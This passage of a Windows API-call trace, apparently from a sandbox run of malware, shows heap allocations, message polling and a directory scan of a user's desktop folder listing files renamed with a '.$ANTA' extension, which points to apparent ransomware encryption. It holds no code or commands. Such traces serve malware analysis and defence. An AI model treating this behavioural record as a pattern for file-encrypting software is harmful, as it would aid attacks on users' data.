wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0135.223] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0135.223] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0135.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0135.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0135.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0135.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0135.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0135.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0135.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0135.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0135.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0135.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0135.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0135.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0135.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0135.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0135.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0135.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0135.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0135.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0135.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0135.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0135.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0135.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0135.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0135.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0135.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0135.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0135.224] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0135.224] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0135.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0135.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0135.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0135.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0135.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0135.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0135.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0135.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0135.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0135.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0135.225] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0135.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0135.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0135.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0135.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0135.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0135.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0135.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0135.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0135.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0135.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0135.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0135.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0135.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0135.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0135.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0135.225] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabc8 [0135.225] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0135.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a298 [0135.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4a) returned 0x436a2f0 [0135.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0135.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0135.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0135.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0135.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0135.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0135.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369bb8 [0135.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369bb8 | out: hHeap=0x1780000) returned 1 [0135.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0135.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0135.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0135.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0135.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0135.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a298 | out: hHeap=0x1780000) returned 1 [0135.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0135.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0135.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0135.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0135.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0135.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0135.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0135.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0135.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0135.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0135.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0135.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7e48 [0135.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a2f0 | out: hHeap=0x1780000) returned 1 [0135.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0135.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0135.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0135.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0135.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0135.227] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0135.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0135.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0135.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0135.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0135.227] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0135.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0135.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0135.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0135.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0135.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0135.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0135.236] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0135.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0135.236] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0135.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0135.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0135.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0135.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0135.236] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0135.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0135.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0135.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0135.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0135.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0135.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0135.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0135.236] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.236] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0135.236] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9")) returned 0x10 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0135.237] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0135.237] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0135.237] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0135.238] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0135.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0135.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0135.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0135.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0135.238] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1578ca90, ftCreationTime.dwHighDateTime=0x1d5f0cc, ftLastAccessTime.dwLowDateTime=0x1cbb7037, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1cbb7037, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43cad48, cFileName=".", cAlternateFileName="")) returned 0x41ac200 [0135.238] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1578ca90, ftCreationTime.dwHighDateTime=0x1d5f0cc, ftLastAccessTime.dwLowDateTime=0x1cbb7037, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1cbb7037, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43cad48, cFileName="..", cAlternateFileName="")) returned 1 [0135.238] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18fab716, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x18fab716, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x190dc99a, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x8d10, dwReserved0=0x0, dwReserved1=0x43cad48, cFileName="-ibxuw5BT.mp4.$ANTA", cAlternateFileName="-IBXUW~1.$AN")) returned 1 [0135.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0135.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a138 | out: hHeap=0x1780000) returned 1 [0135.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0135.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0135.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0135.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0135.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0135.238] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0135.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0135.238] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0135.238] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0135.239] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0135.239] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0135.239] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0135.239] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0135.239] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x194bc710, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x194bc710, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x195ed7b7, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x7210, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="1aQmLq17nlG1P.bmp.$ANTA", cAlternateFileName="1AQMLQ~1.$AN")) returned 1 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0135.239] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0135.240] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0135.240] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) 